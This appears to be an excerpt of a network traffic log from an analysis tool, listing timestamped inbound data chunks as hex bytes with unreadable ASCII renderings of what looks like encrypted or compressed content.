                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2727INData Raw: af d3 69 1e 47 2d 28 dd 8c 57 fc 71 c6 ef f5 3c a2 01 53 f3 5d 88 ea 93 73 0f 31 57 84 d8 c4 9f 72 db cf f8 89 a9 e2 af a1 1b 17 5f 89 1a cc c2 94 12 3a 62 1a a0 34 b0 a9 92 6c 8c fe 3d 28 15 e9 9f 1f 7d aa fb a2 68 5a d1 0f 21 b1 8b 28 33 b6 a0 58 65 72 20 9f 48 37 a3 ae e3 58 65 ec 16 1f 77 bb 1a 5a ea 7b 3f 93 91 2b e8 0c 54 51 30 95 34 bc 33 dc 0e 6f af 0c 09 7b 52 22 58 d7 68 c4 ff aa 3d 43 14 8c 27 74 63 23 dc b8 18 b4 4e 6d 8d 21 5d 3e f4 68 08 7d f7 4c 1d bf a0 f7 c6 93 15 a3 4d d5 a2 88 54 a9 38 7c ac cd 10 41 b0 26 f2 c6 22 d8 e3 82 7f d8 58 a2 4b 44 b4 38 c0 8f d3 14 fc f8 79 cf 84 65 27 eb 61 7d 1e a3 07 72 d0 12 04 2f da e7 12 e0 67 b0 8d 9f b4 30 eb 9d 06 ff 80 50 29 cc 74 8d e7 dd 5e 68 5a 1a b7 59 2c 5a 8e af 7d ea 3a e0 ec bb d2 40 0e 31
                                                                                                                                                                                                                                    Data Ascii: iG-(Wq<S]s1Wr_:b4l=(}hZ!(3Xer H7XewZ{?+TQ043o{R"Xh=C'tc#Nm!]>h}LMT8|A&"XKD8ye'a}r/g0P)t^hZY,Z}:@1
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2743INData Raw: 0a af 1e de b6 7d 50 1e 31 76 36 f0 b0 76 50 c6 84 e0 18 bc 07 c8 f1 1d 91 15 9b ef 03 a7 6b 8b 49 33 e4 0a 14 d8 eb bd 2b 6a ae bc 2f 97 6c f4 a2 30 e7 82 e3 73 f1 58 93 aa 84 3b e4 d9 c3 88 55 9c af f3 f3 61 b1 85 8f 00 fc 7b 47 e0 6b 65 30 57 1b ac 66 d8 25 c0 70 2e 81 1b b3 74 ec f5 23 27 5f 09 00 a5 e7 4d 91 9d 0b 5b ef 80 5b 7d 94 b6 da 20 ef e8 31 0d ea a2 15 03 88 86 e8 67 5a 76 bc 70 6b 1f 62 79 3d b9 ae 9f 18 fe 97 49 34 f3 c2 93 fd b3 6d 62 30 ea 23 8a 2b 6e 1a 8b 77 e2 68 70 b2 6b 44 5b 1d c5 3e 2d 17 e6 fe 18 9d ed c4 bd d6 5f 2f e4 fb 61 a0 29 57 a6 a5 a9 b4 35 ed 21 50 5d bb fc 98 1f 68 af da 04 4c be 8f 21 b2 ae 03 8f f1 bb df a3 4f 9f 32 45 f4 64 38 04 25 c0 8d 0e 45 51 ff 46 3e 72 65 26 24 af 01 0d bf 14 a4 01 db f3 01 5d 4b 6b 88 82 3a
                                                                                                                                                                                                                                    Data Ascii: }P1v6vPkI3+j/l0sX;Ua{Gke0Wf%p.t#'_M[[} 1gZvpkby=I4mb0#+nwhpkD[>-_/a)W5!P]hL!O2Ed8%EQF>re&$]Kk:
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2759INData Raw: cc 5a a4 e0 c7 f9 df 58 50 7d 3a f0 6b c8 a0 67 31 85 97 a7 b1 b6 e6 fe 28 5d a3 f5 4c 81 ad be 9c d2 60 46 ee e1 2e 48 18 f7 47 2f c9 56 cb ee d6 17 de d3 63 df 73 a2 f3 81 46 ae 44 f9 88 13 ca 19 1c ee ea 09 67 91 1b cf a3 09 03 89 86 be f4 e0 d5 6b 25 71 f2 04 32 bc b0 d0 30 aa 16 0d cf 3b 86 22 77 9f a9 c5 3f 28 71 6a 7c a6 f7 bc 9e 03 21 00 1d 21 5d 2e 40 3c 7a 7f 24 ee 2e ba b6 6f 7d 30 bf 55 ff 87 ec 4a a1 7f 2a 34 8c 46 d4 80 32 c3 64 a5 18 7a 1f 3b 9d c2 d1 ca d4 4b a0 eb fb 9d 9d 20 ae 9c 74 f8 20 ea 32 4c d3 e0 99 e0 44 84 ae 3b 91 22 06 16 44 93 36 1b 7b b7 ce ea f9 e2 33 dd 70 6c 7f cd 2e 3c 3d b4 f5 4a 13 47 41 ca 84 c2 04 04 ad 7e c4 27 73 f6 6e 2b e3 5c 27 54 f1 1c a4 63 4c 45 7b 28 e7 89 e1 13 1b b9 d8 0b 2e 28 3a a8 11 f5 60 eb ec 49 a1
                                                                                                                                                                                                                                    Data Ascii: ZXP}:kg1(]L`F.HG/VcsFDgk%q20;"w?(qj|!!].@<z$.o}0UJ*4F2dz;K t 2LD;"D6{3pl.<=JGA~'sn+\'TcLE{(.(:`I
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2775INData Raw: 76 79 5b 9f 1f a7 bd a4 8a 44 ac 04 8e dc 92 bc a4 25 35 08 57 29 da 0b 21 05 81 1d 45 df 9b d6 2b 88 3f 97 e1 55 e9 25 16 92 45 07 c8 ad 11 59 a7 23 93 26 f8 01 a2 5a c3 86 10 ce 93 1d a2 22 86 94 27 ed 00 fc 34 48 c9 8e 9d 61 27 3f 0b 5c 01 d6 7c 03 f7 24 49 5b f5 76 87 1a c3 ba fd 78 94 55 e7 d5 39 8a 04 7e d9 9a 1e bd 5a d8 5b 84 da 87 9e 51 6d d0 84 5c 7a 3b b8 2f 80 fb 00 f8 fa 14 3e 78 a4 cb cf 3b 7c 21 38 5e 79 93 79 c7 6e 68 fc f9 0b b4 17 17 1a 6d e3 60 e7 2c 27 14 d6 ee 9b d2 2f 25 f6 1b 5c 5f 36 d8 c5 fe d8 85 b9 c5 25 db de 85 d3 27 ad d0 44 f1 9f ad 95 62 96 51 6f 27 fb 17 18 44 31 24 11 d0 7a 99 34 8c 5d e9 87 ac 61 51 1d 80 e2 88 ae df 11 a9 bf 8a cf e8 74 ed f2 ab 18 1a 64 75 df 2a 63 01 b8 fc fc ef b8 4c dd 4c 1d 3f f0 b1 3a 0c ca cc 9e
                                                                                                                                                                                                                                    Data Ascii: vy[D%5W)!E+?U%EY#&Z"'4Ha'?\|$I[vxU9~Z[Qm\z;/>x;|!8^yynhm`,'/%\_6%'DbQo'D1$z4]aQtdu*cLL?:
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2791INData Raw: b6 47 8c bb 6b f0 87 d9 e1 bd 14 d8 7b f1 49 b7 7f 89 e3 1c 25 03 ef 4b 34 5e c7 88 9a 8b f1 71 85 cd e5 45 99 36 80 b6 a2 6d ef 19 d0 9c a7 f3 fc b2 b1 e9 22 fc 97 1c c2 f7 cc 52 11 ec e2 98 0c 22 92 3c f2 12 0d 4f b2 69 c1 b5 b7 58 74 96 b6 2b 40 13 85 a9 80 2a 82 10 99 c8 bc ad 45 f3 95 80 e2 be 0c 89 a9 6b c0 3f a7 73 1d 9d 06 98 66 5c 9b a6 9b f6 81 e8 74 07 79 b6 53 29 d2 c3 c2 44 99 fa 53 94 90 39 92 2d 9a 75 89 31 ce c0 d9 0d e5 c7 a1 29 12 49 b6 fd 1b 8f fe a1 58 46 f0 88 fd ae e1 3f ab fe e0 68 06 52 cd 54 c4 00 76 ac 7d 8e f0 59 6c 80 71 c6 d7 1c cd ae 69 7e b1 ea 9c 19 2b 25 ac f4 77 6b 47 a6 62 d7 16 78 63 b3 14 1b ba 16 63 17 73 97 87 b9 a1 c3 63 14 40 57 fa 69 c4 5a d8 ea 01 1b 80 26 f9 ee 4a e0 cd 54 b6 c8 7d da f0 03 69 35 9e 6a a2 97 fa
                                                                                                                                                                                                                                    Data Ascii: Gk{I%K4^qE6m"R"<OiXt+@*Ek?sf\tyS)DS9-u1)IXF?hRTv}Ylqi~+%wkGbxccsc@WiZ&JT}i5j
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2807INData Raw: 67 e5 6c 69 09 d1 65 fe 78 2e 74 eb 3d c0 c9 09 bc 53 90 10 35 ce 90 4d 77 ae 57 de ca 41 c3 6c 68 a8 15 2a 80 29 74 84 f3 4b f2 7d f5 50 04 97 1a b0 a8 59 af a1 89 85 53 e2 05 e4 46 4c 2a d6 19 3e d0 72 86 61 43 2f bd 94 5c 51 d1 cb 1d 77 5e b4 49 3e a6 ba 36 0e 17 6b c8 c9 70 10 cf 07 b7 6b b9 dc 0c 5f a5 c2 b2 cc b1 6e 30 ac 73 9a c8 91 03 4a d9 8d 5f e6 e4 b9 45 25 cc 36 5b d5 d9 6b 94 b6 a3 fd 96 97 ec 2b c6 ad 00 2e 2f 56 d7 fb b2 b3 e8 11 3e 60 b0 cc 4b d0 18 5b 12 60 77 97 d4 72 ea 7c 55 c7 a8 e4 c2 c6 a4 02 7d 42 25 43 5e 88 d0 cc 10 dd d0 a7 30 0e 6e 01 a4 b3 1e 72 a7 b3 26 dd 18 b9 a8 d8 d4 67 8e 53 86 19 69 f2 d4 01 d8 0d 61 e5 9b 8d bf e7 9c cc cf a9 9f 22 10 fe 0e 1b 8c 3f 74 61 5d 85 52 06 04 8a d8 9e 87 a4 81 cb 70 6e 8d 2d 24 04 69 bf 65
                                                                                                                                                                                                                                    Data Ascii: gliex.t=S5MwWAlh*)tK}PYSFL*>raC/\Qw^I>6kpk_n0sJ_E%6[k+./V>`K[`wr|U}B%C^0nr&gSia"?ta]Rpn-$ie
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2823INData Raw: 4f a4 86 9f 10 19 fa 62 df 69 67 85 8f 87 a3 c6 b8 77 f4 6e 65 dc 94 9e b8 35 52 ab cf 92 28 00 18 99 45 23 7a b1 2e a8 eb b1 8d fd c9 ea aa 3a d4 7c 8d 98 bc 89 92 51 69 d2 68 81 c6 f7 d9 be 7d 74 fc 35 24 5b 1f 2d 35 ae fb c5 48 73 ee d7 a6 d8 13 c1 38 c6 59 df d6 a0 ae c7 3f e9 94 f4 ec b7 c3 33 3b 74 c3 9f 4c 1d f6 0f 0c ef 28 94 16 9b 4c e7 df fc cc 16 ca 05 2a 75 6b cc c9 a9 7d b2 c5 8e 4d 8e 9c 64 6e 06 6e 49 8f 10 1b 0d 0c a4 11 04 c0 76 92 f8 d1 6c cd 2f a2 47 05 bd 80 6d f0 98 6b c8 81 61 3b a3 c2 fd e4 73 5f ec d5 5a 9d d5 8c 40 c9 f4 67 2e 55 28 c7 79 1a 91 9f d6 eb 30 58 e7 38 37 4d 7c 08 45 47 43 1c be 90 c3 e4 e9 ec 6c 0a 13 79 4a 46 d5 45 38 6d e3 e4 e2 47 c3 5b 5d 1e 7f 35 60 ab da 60 03 5d 9f 93 f5 6a cc f6 0c 97 8f 64 ed e6 a3 a7 18 ff
                                                                                                                                                                                                                                    Data Ascii: Obigwne5R(E#z.:|Qih}t5$[-5Hs8Y?3;tL(L*uk}MdnnIvl/Gmka;s_Z@g.U(y0X87M|EGClyJFE8mG[]5``]jd
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2839INData Raw: 9f 40 e3 4b c5 70 ea e6 41 f7 f8 bb af 21 83 38 23 a4 ee 6a 67 4f ad 82 7f ed d3 14 a9 fd a4 e3 6b 60 87 de e2 45 8d ab 3d a7 d7 b4 27 a9 82 dc ca 99 ed ed 96 b3 cc 36 82 65 9e 76 20 92 49 0a 04 02 62 a2 c1 fb 85 be 4a ae 11 a8 1c aa 4f b6 3b 5c d8 a4 cb b3 0b 72 07 b9 25 8b e1 01 8f b4 61 5b 4a d9 6b 72 a7 65 09 2a 11 ba 55 06 22 b7 0d bb ce 7e 0d 31 78 29 b4 9a a0 da 5d b7 fb 80 8d bb bf 09 54 4b 67 5f 85 52 1e de 09 e2 9a 28 12 c5 82 e6 94 d2 8c 63 f1 8d 6c eb 45 f4 79 1f 51 0a 73 4e 00 54 ce f1 d7 41 11 7d 80 f2 01 61 df 60 73 f2 dd bc 42 c2 37 6a dc 15 70 f3 29 45 50 6f 09 2d 42 1a 27 29 d9 e1 6b d6 13 ac 4c ba 8d ac 06 b4 73 6c 18 36 84 fb c5 8d e8 9e b1 61 a3 2f f1 ee 3e 6d 5e 32 93 a2 54 70 2c 8d 5a e8 e2 62 db 85 73 ed 06 46 07 d2 0f 7d 81 55 6e
                                                                                                                                                                                                                                    Data Ascii: @KpA!8#jgOk`E='6ev IbJO;\r%a[Jkre*U"~1x)]TKg_R(clEyQsNTA}a`sB7jp)EPo-B')kLsl6a/>m^2Tp,ZbsF}Un
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2855INData Raw: c0 08 61 57 b0 e6 a7 9c 25 f1 3c 8d ee 7c 1a bc 0d 40 80 16 31 57 c7 62 0e 91 ef 8f fe e3 41 92 58 11 18 12 db 63 96 e7 48 02 fe 27 aa 97 70 3d 4f 00 59 b8 3d 95 33 8d 5f 0c 9c d7 57 43 71 12 06 50 10 97 dc 24 a6 63 7b 0a 08 e0 94 b7 ac ba 1a b6 4b dd 47 f6 cb ba f6 3b 00 8e 62 d6 14 a6 89 40 ca 60 f5 e8 aa f3 5b 91 57 15 43 7d f6 06 89 6f 0d 6e 22 25 31 71 b0 8c 5e 39 13 14 63 98 2f fa 7d 27 cd 47 ac 35 3e 6a ec 92 43 4e 98 c1 8d c6 a0 c9 56 58 aa d4 a4 00 25 4f 84 41 c0 f2 99 5e 6e 62 49 f8 5f 19 b3 fe c0 7b a4 26 89 a3 2c 83 1f 3d af 34 cb da ba 34 79 73 03 1a 85 ed cd 10 0f 80 ee 13 49 65 19 f3 87 85 25 af 75 ce 20 c2 f8 b7 aa 98 e1 a7 88 49 88 fa d8 f7 de 0e 14 23 d4 05 fa 39 f6 58 90 8f 5c 89 7e 72 92 ec 79 6a 66 3e e5 7d fe 9e 88 de 64 19 52 1d ef
                                                                                                                                                                                                                                    Data Ascii: aW%<|@1WbAXcH'p=OY=3_WCqP$c{KG;b@`[WC}on"%1q^9c/}'G5>jCNVX%OA^nbI_{&,=44ysIe%u I#9X\~ryjf>}dR
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2871INData Raw: e9 3f f5 fc ed f5 ee ed 59 c5 1f 50 87 59 8b b6 ac 79 3a de 1f f7 e4 7d 7d 1a 63 8a dc 5a 3d 36 78 f0 2b 8a 89 93 1c af 4e 09 c3 fd b6 b2 e9 82 20 f4 72 fc 4e 25 da 94 70 0e 28 d9 85 c5 12 7e c4 cd 40 40 94 9f 73 d2 ba 53 b0 bd 94 33 17 2d 80 9c 9b eb ea 0a f4 fc be 4d ee 72 e3 97 ef 40 9f fb 24 d8 1c fb e2 c2 85 1b 97 e2 96 81 b3 67 e8 78 d7 78 00 be b4 ba ad 1e 1f 64 8d 51 3f 7b 1c 70 00 d2 e3 44 ff c1 b6 8e 15 b2 2b 88 11 9f 49 a8 e0 e5 4c 55 97 da 3d 3d 88 60 6d ba 21 14 13 fa 26 ba 65 2e 34 65 0e 96 74 c8 1c 1b c4 b2 aa ad 9f 7e 13 97 e9 a7 1f ce 40 a4 21 4c 6a a0 90 a6 f9 a5 d7 6f 97 1c 94 72 71 ad 84 b9 c1 91 6c 90 df 97 56 84 fa a6 7d 8f ba e1 0a 1f b7 3f a1 e7 7c 10 93 1f b7 1a 7a 43 65 16 dd a0 ee de bc e9 c7 c5 ae 3a 21 5a 00 32 18 d8 c3 22 26
                                                                                                                                                                                                                                    Data Ascii: ?YPYy:}}cZ=6x+N rN%p(~@@sS3-Mr@$gxxdQ?{pD+ILU==`m!&e.4et~@!LjorqlV}?|zCe:!Z2"&
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2887INData Raw: fc 6b 2c 33 85 e3 39 94 5b 90 f5 92 5c de e2 7c 40 4f e8 ff 62 1b 77 95 ee 13 1b 13 6c 97 91 26 69 a9 09 d8 5f ee fd 20 0c 55 f8 3f 31 3c ad 8b 58 f5 e6 41 7d fd a1 1e 6f 01 a6 14 c2 dd 2e 5c 7c dd d9 93 33 fc 2d 3c a9 61 ac 55 59 ab b0 ca d3 c2 10 67 51 66 4d 44 d7 6b d9 9b a0 46 fb 07 d5 b8 ad 95 e7 c0 5e f9 11 35 15 ba b0 83 d4 8a c2 1b 4c 19 49 02 e2 97 16 a0 97 5b 23 cd 84 33 78 37 6b 0e a8 b3 b2 82 41 0b 82 94 4e 51 e6 04 8c f0 50 2c 14 9f af bd 51 18 45 46 18 6a 3b 91 eb 6c 3c 52 f7 94 b8 e5 d6 02 3a 40 76 68 c0 f5 67 37 a7 b5 cd e2 e6 99 2f da 0b 29 9a 9b f8 26 30 3b c9 a4 6a 98 e5 a2 9d ea 00 2a 61 dc 93 67 a4 03 b9 d6 73 ee e8 27 0f 33 87 ee c5 d6 17 bf 53 b7 19 c9 52 20 64 82 64 db 8c d7 9e 4a 44 15 ad d3 ed 73 6f 42 3f 25 90 b0 22 5b f6 25 ab
                                                                                                                                                                                                                                    Data Ascii: k,39[\|@Obwl&i_ U?1<XA}o.\|3-<aUYgQfMDkF^5LI[#3x7kANQP,QEFj;l<R:@vhg7/)&0;j*ags'3SR ddJDsoB?%"[%
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2903INData Raw: 89 8d d9 ef 35 33 b7 83 76 2b d4 f4 4a 78 ab 70 ef 68 e5 62 56 60 36 2b 51 8b af d4 23 3d ca 35 75 77 78 0e 8f 0a 6d 10 a9 db e3 7c fe c8 5e 12 1c 1b 97 bc 0d e1 ec e7 0f cc 0e 55 c1 b3 a6 2c 48 5d 05 dd 93 e3 e2 43 a0 c8 9f ac 6f 2d 79 b8 77 32 0e b4 0e f7 f5 09 b2 f0 3f 3a 52 08 90 e2 7c 49 21 d9 60 8a 9f 0c fb 6b b1 ff 41 b9 ac 45 ab 0c e9 b7 f9 e3 a3 05 77 f0 0f c9 17 0b 1c c4 3a 3f d0 6c d1 29 44 b1 ce 0a 03 33 f4 19 25 36 a0 fe aa 07 b3 0a 6e ee 24 c5 a5 45 6d 9e 09 a6 03 05 77 b0 55 f1 9a 53 19 1e 71 ce 7a 6b 39 3c a5 a5 fe 9f 0b 48 99 f5 c3 df 49 5e 02 0f f1 f6 0a 5c 34 3e f8 bc 41 6c 47 a1 40 ba c3 ef ad b4 81 7c de 99 2f 90 1b bc 02 8c f6 ea 95 54 e5 af ac 19 85 a9 97 6e f9 21 33 19 a0 9b 90 5d 1b 4f 0f 33 e2 ef 8a 52 5e 09 b9 fc ad 22 8b 31 c3
                                                                                                                                                                                                                                    Data Ascii: 53v+JxphbV`6+Q#=5uwxm|^U,H]Co-yw2?:R|I!`kAEw:?l)D3%6n$EmwUSqzk9<HI^\4>AlG@|/Tn!3]O3R^"1
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2919INData Raw: 1d 53 54 fe 24 51 98 77 21 e5 53 36 b7 b9 39 33 2f b1 a1 0d 78 98 eb 9a bf 45 65 bb 89 f3 d8 a5 96 da b1 83 eb e1 15 c6 43 1b 89 e7 71 02 cb 4f 8e 94 ff 7e 24 39 a4 ef 56 6d 76 4a cc 71 cd b1 c6 96 4c ce 88 fb 2b f2 6a 02 33 a9 70 ba 53 ea f8 23 2b 3b 39 8f 97 eb bb b7 07 b3 13 90 75 c0 97 3e 9c 18 5a 9c 84 da 33 46 19 97 e1 4e ec b2 6a 60 86 f5 8f 62 4a 70 58 1f af 14 65 0a a4 4a 42 7a ab c1 94 64 e8 63 50 ee a4 0b ab c0 a5 dc d3 0b 9f df dc 2d 02 b1 0f 9c 54 86 09 1c 4a 7c e1 a8 73 da 9f f9 d9 ea 24 2b bd 20 f4 36 70 a1 28 8b c2 3e 31 c6 74 ab f0 e4 b9 7d f1 bd fb b4 39 a4 cc ed d0 da 4d aa 6e bd 45 82 3d f6 19 55 d0 9f 2c e5 5a a4 21 d1 f9 30 92 e8 43 11 9d c6 52 0d 26 0e 2b 99 a7 26 4d 49 d2 9b 30 71 fe f7 6b 8d 2b 20 c4 a2 75 4f b5 da 55 c0 16 1b 0c
                                                                                                                                                                                                                                    Data Ascii: ST$Qw!S693/xEeCqO~$9VmvJqL+j3pS#+;9u>Z3FNj`bJpXeJBzdcP-TJ|s$+ 6p(>1t}9MnE=U,Z!0CR&+&MI0qk+ uOU
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2935INData Raw: 2d 87 66 11 36 43 1c 33 2f 93 00 17 49 79 96 f0 b0 11 35 0d 00 13 77 7e 92 5d 98 e2 8f c5 6e 42 01 88 ea a3 2e 75 7e 9e 9b fa 09 27 48 67 25 e0 f5 7e a8 8b da ab 91 5e b3 3c 73 44 e5 5c 40 43 c9 70 5c aa ef a0 12 d9 ed c1 fb 04 43 72 65 b7 54 a0 c8 63 59 7c cd c5 e9 4a 3c 5c 44 d7 2f d7 40 55 9e 50 94 f2 6b 37 16 5b 67 81 8c 7c 63 3d 29 a1 8e 97 2a d4 4c 20 61 f5 ec ef a4 4c e7 fa 25 b5 d3 ab 33 e0 9b 0c 52 18 e0 dd 57 0a 3e cd a1 ab 33 fc c3 66 57 00 2f 64 07 fb 92 63 cc 6f 90 77 00 19 87 8a ba 53 fe ac 24 2f 31 5a ab 66 bc f8 d0 35 ce d4 da 2a 64 6e a0 64 11 75 d6 0f 60 3e d3 57 eb bb fa 82 b3 a8 1c ff 87 7f 92 71 04 76 1d b1 16 b0 52 b1 71 4d 53 62 5f 3e d8 2a 0f fd 30 18 a7 22 37 b7 6d 8e 8a 1f 43 5a b4 0b c5 de 94 5e 72 6d ed 8b c0 2e 76 7b bd fc a8
                                                                                                                                                                                                                                    Data Ascii: -f6C3/Iy5w~]nB.u~'Hg%~^<sD\@Cp\CreTcY|J<\D/@UPk7[g|c=)*L aL%3RW>3fW/dcowS$/1Zf5*dndu`>WqvRqMSb_>*0"7mCZ^rm.v{
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2951INData Raw: fd b5 2f 06 5f 5e bc 5e 99 cd 91 4e 17 a6 d5 fc a7 f4 bd ee 3e 93 1d 33 1c 24 56 a1 2a a1 f3 71 fd 32 d5 b9 36 cb f8 0b bc 55 74 8e 23 36 aa c8 64 3c 6d 2c 20 b4 ba 93 e8 7c ce 2b cc 72 3f 27 be 8c 4f 09 f7 9b 0c 0b 62 95 96 ca 68 55 a6 0e eb 0f 53 d3 5b 13 a8 84 05 e5 b7 d8 4a aa c0 b9 44 d5 dc e2 e5 58 b7 a9 cc d3 57 02 10 58 e8 a5 be 26 c9 b9 af 29 0a 44 1c e3 36 0b ec c3 bf d4 6d d0 da bc 17 23 65 4e b4 de 1f d0 65 62 08 40 44 3d e7 34 ec 7a 14 a2 d9 e9 da 5a 8d 34 dd ee a7 88 f2 57 da ce f5 1e f8 f8 24 e7 08 84 95 86 0a 79 a1 01 a8 2d 22 75 03 2b d9 c4 f8 af c4 d7 41 76 36 6d b4 a1 7b 74 d4 ae dd af b6 7a 17 60 48 c2 a1 5e 8b 60 52 8a de d8 10 13 a8 81 f4 57 94 40 92 f3 81 20 73 a9 91 5d dd f9 36 c6 b7 f2 93 12 8e a4 23 97 2a d5 b3 30 e8 3b df 21 91
                                                                                                                                                                                                                                    Data Ascii: /_^^N>3$V*q26Ut#6d<m, |+r?'ObhUS[JDXWX&)D6m#eNeb@D=4zZ4W$y-"u+Av6m{tz`H^`RW@ s]6#*0;!
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2967INData Raw: b1 89 30 54 9d 1f 74 3a 42 68 74 33 41 f4 d5 97 07 e0 70 17 b9 7e a9 d6 d9 54 cc b3 9d 77 25 ad bb 24 f4 94 e7 e1 2a fc fc 52 bb 40 14 76 88 87 86 81 36 00 68 73 9c 5f 63 ac d4 fa e1 16 e0 3a e8 0d c4 3a aa 45 d6 71 3c d2 72 ff 27 76 2f e3 ea bf 71 a7 c8 4d 29 c7 b6 f8 a4 b0 e9 a4 31 bc 4b 2f 9f 97 12 de 9b 5c fe 51 5d 8e b3 02 0f 15 6b 26 fb 54 de 3d d3 05 98 02 e1 81 aa 44 8d 6e cc cf 73 7e b4 38 84 03 38 52 09 63 33 1a 93 4e 47 fe c0 c9 02 3b 34 91 88 c2 43 16 14 ec a9 7f 7d 55 cc dd 10 b5 c5 08 7f ad e5 20 83 23 06 0b da ab 7d 07 15 fa 94 3c f3 1c 26 86 80 37 fe 14 4b 5d 7e f2 0d a9 eb e7 d6 b7 20 8a ca 1d f2 05 5a b6 ae 80 86 a5 07 d7 c8 38 85 9a 51 31 6e de a9 d0 5f d7 fa 8d 21 fb 7c e4 d0 83 9a 0b 3b 3c 35 a4 41 f9 bb 24 99 04 7d ba 2d 3e 86 95 c2
                                                                                                                                                                                                                                    Data Ascii: 0Tt:Bht3Ap~Tw%$*R@v6hs_c::Eq<r'v/qM)1K/\Q]k&T=Dns~88Rc3NG;4C}U #}<&7K]~ Z8Q1n_!|;<5A$}->
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2983INData Raw: 61 a7 a6 eb 14 96 31 1a 21 23 d8 af 4b 95 9e 6f 29 b5 58 d2 da 5f 7c c7 32 3c c8 0c 63 1d ce 95 83 ae 7d 24 a7 ea 18 94 03 9a f4 82 48 9d 72 20 08 58 69 3f 42 26 f3 37 1e 2d 6d 22 a9 75 48 d2 e1 7a 65 ad 91 1b 3b db 01 e6 f9 b8 4a 92 9a e5 fc a9 7c 60 16 22 28 e6 49 19 60 ae a8 08 9b 0d 2e b2 04 f8 fc d6 f9 31 cc 1b 98 d8 2c a8 98 11 50 9e e3 10 8f c5 17 5e 09 41 49 a4 f7 b3 81 0b dd 21 2e a1 e9 c6 80 8b e0 56 04 10 2b 98 72 ae 74 19 53 2b a5 48 9e e2 9a bf 5b f9 4c e6 8d 4a eb ef ed 82 c8 73 4f 43 99 8f f2 2c 52 6c ce f6 0d 0e 28 69 2b 4c da 10 a4 19 1f f8 2a 7e b6 4c 91 ff 51 46 b6 a9 fd 27 bd a8 4f b8 50 43 b2 9e 1e d4 3b 2d ff 9f 51 02 e1 e7 e6 a9 48 68 c5 4c e0 bf 9e 87 fd 9c e1 f3 bb ba ae d1 51 10 2f 80 31 05 94 2e 85 0f 09 69 d4 18 f7 7f 60 dc 74
                                                                                                                                                                                                                                    Data Ascii: a1!#Ko)X_|2<c}$Hr Xi?B&7-m"uHze;J|`"(I`.1,P^AI!.V+rtS+H[LJsOC,Rl(i+L*~LQF'OPC;-QHhLQ/1.i`t
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2999INData Raw: 22 32 80 31 ef 75 48 42 a0 eb 80 55 76 9b f5 5d ed 7c 2e 2f db a8 97 09 d8 45 04 85 9d 01 4d e8 01 b6 29 c3 33 cf 8c a1 1b 42 d8 9a 92 4b 57 d4 c2 8f 60 e1 cf 83 3b 95 4b bd 14 dd b4 ef 54 68 48 33 16 86 d5 78 ee c3 d8 8f 75 25 da ad a8 4c 43 89 57 39 0b 7a 62 ee 67 2a e2 eb 78 6e 91 76 7f e2 16 75 28 62 e5 b0 18 b4 5c e7 cc 93 d9 c3 56 89 db 8a 7a 72 25 e4 d5 93 50 0a cb c9 ff 22 a7 ac ee 06 8e 2b cb 56 2b 9e 88 d5 c4 51 81 f7 d2 dd 7b 05 06 a3 d7 56 60 30 a6 0d 78 80 5f f9 1f 73 29 c2 02 a1 ce ab 2a 92 51 ba 02 49 92 11 26 a6 c9 dd e2 0f ad b6 36 86 ae 0d e6 a1 9e 84 da d0 d2 ca db a9 bf e6 1f 79 fd fd 19 c0 98 6d 9f 86 56 27 25 aa 05 44 22 d3 f8 c2 96 61 4d a4 d0 45 8d 94 62 43 93 df 01 07 34 55 de 69 fc e1 bc b8 ba 0e 75 4c 32 4a ee b4 44 f2 3e 6b 2d
                                                                                                                                                                                                                                    Data Ascii: "21uHBUv]|./EM)3BKW`;KThH3xu%LCW9zbg*xnvu(b\Vzr%P"+V+Q{V`0x_s)*QI&6ymV'%D"aMEbC4UiuL2JD>k-
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3015INData Raw: d2 6f e0 20 11 a1 4b d9 ef 32 c5 ab ca 4a d1 47 3e 04 48 f5 1e ce b3 29 03 1e 48 3e 2e b4 a6 60 9c c9 f9 6e 8c 3b 3d fc a0 53 38 69 01 5d 84 46 cd 4d db 3e 2d 6f de 15 16 4f c3 fb 34 50 18 d9 d3 e2 ba 68 04 fe c8 c4 92 b3 00 50 0e 1e ff 5e b7 1b 71 5f fb 0a 1e 77 ce 21 4a f3 f1 70 5f 18 2d 06 68 fc 06 2a 3b e3 72 ab 61 30 5c d8 ae 0f 73 7c 4b 1e f7 2f ff 81 71 5f 53 16 93 83 18 68 26 44 33 0e 04 1d e4 7c 7c 35 fa ef bb 6b b6 dc f5 75 1a 57 f9 1c 27 81 91 e9 00 94 de a9 36 0a c2 5c 7f 8b 53 93 87 dd ba 78 df d9 98 9d 9e 2b 23 31 57 e5 9f 4c 7a 7a 66 39 6d 41 b9 01 97 6d 75 4e ca 15 96 c8 13 9e 31 bd 2e 71 12 62 99 5e 44 0a 7d 7f 28 04 f1 d5 72 65 39 0a 8a 7c 8c f8 47 72 4a 2e 65 12 29 53 04 c6 36 2f df 0d 29 98 16 77 48 5a 29 2b 3b 81 9b 2d 22 33 4e 8d cd
                                                                                                                                                                                                                                    Data Ascii: o K2JG>H)H>.`n;=S8i]FM>-oO4PhP^q_w!Jp_-h*;ra0\s|K/q_Sh&D3||5kuW'6\Sx+#1WLzzf9mAmuN1.qb^D}(re9|GrJ.e)S6/)wHZ)+;-"3N
